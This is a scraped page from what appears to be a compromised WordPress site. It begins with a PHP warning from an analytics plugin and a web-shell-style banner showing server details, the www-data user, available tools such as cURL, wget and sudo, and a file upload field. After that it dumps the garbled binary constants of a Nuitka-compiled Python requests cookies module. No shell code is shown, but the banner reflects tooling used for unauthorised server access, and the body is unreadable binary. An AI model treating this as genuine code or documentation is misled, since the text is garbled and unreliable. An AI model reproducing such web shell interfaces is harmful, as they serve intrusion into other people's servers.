Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
�� �_r�.�� �_new_headers�.�� �urlparse�.�� �url�.��
�scheme�.�� �type�.��
�netloc�.�� �get_host�.�� �headers�.�� �get�.��
�Host���.�� �to_native_string�.�� �Host�.�� }��encoding��utf-8�s.�� �
urlunparse�.�� �path�.��
�params�.�� �query�.�� �fragment�.��A �=Cookie headers should be added with add_unredirected_header()�.��Q �Mcookielib has no legitimate use for this method; add it back if you find one.�.�� �is_unverifiable�.�� �get_origin_req_host�.�� �_headers�.��� ��Make a MockResponse for `cookielib` to read.
:param headers: a httplib.HTTPMessage or analogous carrying the headers
�.�� �
getheaders�.�� �_original_response�.�� �MockRequest�.�� �MockResponse�.�� �response�.�� �msg�.�� �extract_cookies�.��� ��Extract the cookies from the response into a CookieJar.
:param jar: cookielib.CookieJar (not necessarily a RequestsCookieJar)
:param request: our own requests.Request object
:param response: urllib3.HTTPResponse object
�.�� �add_cookie_header�.�� �get_new_headers�.�� �Cookie���.��n �j
Produce an appropriate Cookie header string to be sent with `request`, or None.
:rtype: str
�.�� �name�.��
�domain�.�� �
clearables�.��
�append�.��* �&too many values to unpack (expected 3)�.��
� cookiejar�.�� �clear�.��o �kUnsets a cookie by name, by default over all domains and paths.
Wraps CookieJar.clear(), is O(n).
�.�� �_find_no_duplicates�.��� ��Dict-like get() that also supports optional domain and path args in
order to resolve naming collisions from using one cookie jar over
multiple domains.
.. warning:: operation is O(n), not O(1).
�.�� �remove_cookie_by_name�.�� h*h��.��
�Morsel�.�� �morsel_to_cookie�.�� �
create_cookie�.�� �
set_cookie�.��� ��Dict-like set() that also supports optional domain and path args in
order to resolve naming collisions from using one cookie jar over
multiple domains.
�.��� ��Dict-like iterkeys() that returns an iterator of names of cookies
from the jar.
.. seealso:: itervalues() and iteritems().
�.�� �self�.�� �iterkeys�.�� �RequestsCookieJar.iterkeys�.��� ��Dict-like keys() that returns a list of names of cookies from the
jar.
.. seealso:: values() and items().
�.��� ��Dict-like itervalues() that returns an iterator of values of cookies
from the jar.
.. seealso:: iterkeys() and iteritems().
�.�� �value�.�� �
itervalues�.�� �RequestsCookieJar.itervalues�.��� ��Dict-like values() that returns a list of values of cookies from the
jar.
.. seealso:: keys() and items().
�.��� ��Dict-like iteritems() that returns an iterator of name-value tuples
from the jar.
.. seealso:: iterkeys() and itervalues().
�.��
� iteritems�.�� �RequestsCookieJar.iteritems�.��� ��Dict-like items() that returns a list of name-value tuples from the
jar. Allows client-code to call ``dict(RequestsCookieJar)`` and get a
vanilla python dict of key value pairs.
.. seealso:: keys() and values().
�.�� �domains�.��6 �2Utility method to list all the domains in the jar.�.�� �paths�.��4 �0Utility method to list all the paths in the jar.�.��z �vReturns True if there are multiple domains in the jar.
Returns False otherwise.
:rtype: bool
�.��
�cookie�.�� �
dictionary�.��� ��Takes as an argument an optional domain and path and returns a plain
old Python dict of name-value pairs of cookies that meet the
requirements.
:rtype: dict
�.�� �RequestsCookieJar�.�� �__contains__�.�� �CookieConflictError�.�� ��Dict-like __getitem__() for compatibility with client code. Throws
exception if there are more than one cookie with name. In that case,
use the more explicit get() method instead.
.. warning:: operation is O(n), not O(1).
�.�� �set�.��� ��Dict-like __setitem__ for compatibility with client code. Throws
exception if there is already a cookie of that name in the jar. In that
case, use the more explicit set() method instead.
�.��p �lDeletes a cookie given a name. Wraps ``cookielib.CookieJar``'s
``remove_cookie_by_name()``.
�.�� �
startswith�.�� �"���.�� �endswith�.�� �replace�.�� �\"�� ���.��
� cookielib�.��
� CookieJar�.�� �copy�.��
�update�.��E �AUpdates this jar with cookies from another CookieJar or dict-like�.�� �name=%r, domain=%r, path=%r�.��� X� Requests uses this method internally to get cookie values.
If there are conflicting cookies, _find arbitrarily chooses one.
See _find_no_duplicates if you want an exception thrown if there are
conflicting cookies.
:param name: a string containing name of cookie
:param domain: (optional) string containing domain of cookie
:param path: (optional) string containing path of cookie
:return: cookie.value
�.�� �toReturn�.��, �(There are multiple cookies with name, %r�.�� X� Both ``__get_item__`` and ``get`` call this function: it's never
used elsewhere in Requests.
:param name: a string containing name of cookie
:param domain: (optional) string containing domain of cookie
:param path: (optional) string containing path of cookie
:raises KeyError: if cookie is not found
:raises CookieConflictError: if there are multiple cookies
that match name and optionally domain and path
:return: cookie.value
�.�� �pop�.�� �
_cookies_lock���.��8 �4Unlike a normal CookieJar, this class is pickleable.�.�� �
_cookies_lock�.��
� threading�.�� �RLock�.�� �
set_policy�.�� �
get_policy�.��, �(Return a copy of this RequestsCookieJar.�.�� �_policy�.��* �&Return the CookiePolicy instance used.�.�� �new_jar�.�� �version�.�K .�� �port�.�h].�� �/�.��
�secure�.�� �expires�.�� �discard�.�� �comment�.�� �comment_url�.�� �rest�.�� }��HttpOnly�Ns.�� �rfc2109�.��8 �4create_cookie() got unexpected keyword arguments: %s�.�� �port_specified�.�� �domain_specified�.�� �.���.�� �domain_initial_dot�.�� �path_specified�.��
�Cookie�.��� ��Make a cookie from underspecified parameters.
By default, the pair of `name` and `value` will be set for the domain ''
and sent on every request (this is sometimes called a "supercookie").
�.�� �max-age�.�� �time�.�� �max-age: %s must be integer�.�� �calendar�.��
�timegm�.�� �strptime�.�� �%a, %d-%b-%Y %H:%M:%S GMT�.�� �key�.�� �HttpOnly�.�� �httponly�.��c (�comment��comment_url��discard�h*�expires�h)h�port��rest��rfc2109��secure�h@�version�t�.��F �BConvert a Morsel object into a Cookie containing the one k/v pair.�.��J XC Returns a CookieJar from a key/value dictionary.
:param cookie_dict: Dict of key/values to insert into CookieJar.
:param cookiejar: (optional) A cookiejar to add the cookies to.
:param overwrite: (optional) If False, will not replace cookies
already in the jar with new ones.
:rtype: CookieJar
�.��% �!You can only merge into CookieJar�.�� �cookiejar_from_dict�.�� h.� overwrite���.�� �cookies�.��� ��Add cookies to cookiejar and returns a merged CookieJar.
:param cookiejar: CookieJar object to add the cookies to.
:param cookies: Dictionary or CookieJar object to be added.
:rtype: CookieJar
�.��� ��
requests.cookies
~~~~~~~~~~~~~~~~
Compatibility code to be able to use `cookielib.CookieJar` with requests.
requests.utils imports from here, so be careful with imports.
�.�� �__doc__�.��6 �2/usr/lib/python3/dist-packages/requests/cookies.py�.�� �__file__�.�� �__spec__�.��
�origin�.�� �has_location�.�� �
__cached__�.�� �_internal_utils�.�� h��.�K.��
�compat�.�� (h_hhh5�MutableMapping�t�.�h�.�� �dummy_threading�.�� �builtins��object�����.��
� metaclass�.�� �__prepare__�.�� �__getitem__�.��2 �.%s.__prepare__() must return a mapping, not %s�.�� �__name__�.�� �<metaclass>�.�� �requests.cookies�.�� �
__module__�.��� X� Wraps a `requests.Request` to mimic a `urllib2.Request`.
The code in `cookielib.CookieJar` expects this interface in order to correctly
manage cookie policies, i.e., determine whether a cookie can be set, given the
domains of the request and the cookie.
The original request object is read-only. The client is responsible for collecting
the new headers via `get_new_headers()` and interpreting them appropriately. You
probably want `get_cookie_header`, defined below.
�.�� �__qualname__�.�� �__init__�.�� �MockRequest.__init__�.�� �get_type�.�� �MockRequest.get_type�.�� �MockRequest.get_host�.��# �MockRequest.get_origin_req_host�.�� �get_full_url�.�� �MockRequest.get_full_url�.�� �MockRequest.is_unverifiable�.�� �
has_header�.�� �MockRequest.has_header�.�� N��.�� �
get_header�.�� �MockRequest.get_header�.�� �
add_header�.�� �MockRequest.add_header�.�� �add_unredirected_header�.��'